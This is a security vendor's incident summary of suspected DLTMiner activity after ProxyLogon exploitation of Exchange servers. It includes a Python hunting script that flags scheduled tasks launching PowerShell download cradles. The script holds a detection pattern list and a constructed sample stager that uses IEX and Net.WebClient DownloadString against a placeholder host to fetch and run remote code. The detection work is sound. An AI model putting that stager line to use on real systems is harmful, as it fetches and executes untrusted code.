Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.
We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.
Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.
In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.
Here’s the latest from our TRU Team…
- What Did We Find?
  - Suspected DLTMiner activity: a scheduled task attempting to execute PowerShell code on a server
  - This intrusion is attributed to a DLTMiner campaign targeting on-premises Microsoft Exchange servers, based on IOCs shared with that campaign
  - External research reports place the earliest sighting of this campaign on 5-Mar-2021, when threat actors began to target externally accessible Exchange servers vulnerable to ProxyLogon
- How Did We Find It?
  - Detected in the midst of onboarding a business services organization
  - Our machine learning PowerShell classifier detected the download of a malicious second-stage payload
  - Our 24/7 SOC was alerted and investigated
- What Did We Do?
  - Confirmed this incident was directly tied to the ProxyLogon vulnerabilities
  - Mapped the remaining foothold using a multi-signal investigation across network, endpoint and log sources
  - Identified patient zero
  - Provided recommendations and support to patch and remediate exposed systems, including Microsoft Exchange
- What Can You Learn From this TRU Positive?
  - The activity we detected involved the post-compromise download of a second-stage payload on a non-Exchange server
  - This case demonstrates the speed at which attackers can leverage an initial entry point (the ProxyLogon Exchange server vulnerabilities) to establish a foothold on other systems and persist beyond patching
  - Luckily this business was in the process of onboarding, so we were able to detect the threat, contain it and support remediation
  - At eSentire we onboard with an “assume compromised” strategy: we baseline your environment’s activity assuming the worst-case scenario (it’s malicious) and adjust thresholds over time
- Ask yourself…
  - Have you proactively patched and remediated the ProxyLogon vulnerabilities in your Exchange server?
  - Are you able to detect and block applicable Indicators of Compromise (IOCs)?
  - Can you track threat actor lateral movement across your environment?
  - What level of incident response support do you have to fully remediate and recover from a similar threat?
  - What signal sources are available to your team for investigation? In this case we leveraged network, endpoint and log sources to identify the full scope of the threat actor’s presence.
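One way to hunt for the scheduled-task-to-PowerShell pattern described under What Did We Find, added here as an illustration and not eSentire’s own detection logic: the script parses the task-definition XML that Windows records in Security event 4698 when a task is created, expands any -EncodedCommand payload and flags download-cradle indicators. The indicator list, the two-indicator threshold and the sample tasks are constructed assumptions.

```python
"""Hunt for scheduled tasks that launch PowerShell download cradles.
Parses the task-definition XML recorded in Windows Security event 4698
(A scheduled task was created), expands -EncodedCommand payloads and scores
the command line for second-stage download indicators. Samples are constructed."""
import base64
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Patterns typical of a PowerShell stager fetching a second stage (assumed list).
INDICATORS = [
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"\biwr\b",
    r"net\.webclient", r"invoke-expression", r"\biex\b", r"https?://",
    r"-w(indow(style)?)?\s+hidden", r"-(ep|exec(utionpolicy)?)\s+bypass",
]

def decode_encoded_command(args: str) -> str:
    """Replace a -EncodedCommand/-enc base64 (UTF-16LE) blob with its plaintext."""
    m = re.search(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", args, re.I)
    if not m:
        return args
    try:
        return args[:m.start()] + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return args

def score_task(task_xml: str) -> dict:
    """Return whether the task's PowerShell actions look like a download stager."""
    hits = set()
    for ex in ET.fromstring(task_xml).findall(".//t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).lower()
        if "powershell" not in cmd and "pwsh" not in cmd:
            continue
        decoded = decode_encoded_command(ex.findtext("t:Arguments", default="", namespaces=NS))
        hits.update(p for p in INDICATORS if re.search(p, decoded, re.I))
    # Require two independent indicators so a lone URL or -w hidden does not page.
    return {"suspicious": len(hits) >= 2, "indicators": sorted(hits)}

# Constructed samples: a benign maintenance task and an encoded download cradle.
TASK = ("<Task xmlns='http://schemas.microsoft.com/windows/2004/02/mit/task'>"
        "<Actions><Exec><Command>{}</Command><Arguments>{}</Arguments>"
        "</Exec></Actions></Task>")
BENIGN = TASK.format("powershell.exe", "-File C:\\Scripts\\cleanup-logs.ps1")
STAGER_PS = "IEX (New-Object Net.WebClient).DownloadString('http://stage2.invalid/a')"
ENCODED = base64.b64encode(STAGER_PS.encode("utf-16-le")).decode()
MALICIOUS = TASK.format("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                        "-w hidden -ep bypass -enc " + ENCODED)

if __name__ == "__main__":
    print(score_task(BENIGN), score_task(MALICIOUS))
```

In practice the task XML comes from the EventData of 4698 events exported from your SIEM, or from Get-ScheduledTask | Export-ScheduledTask on a host under investigation.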
If you are not currently engaged with a Managed Detection and Response provider, we highly recommend you partner with us for security services in order to disrupt threats before they impact your business.
Want to learn more? Connect with an eSentire Security Specialist.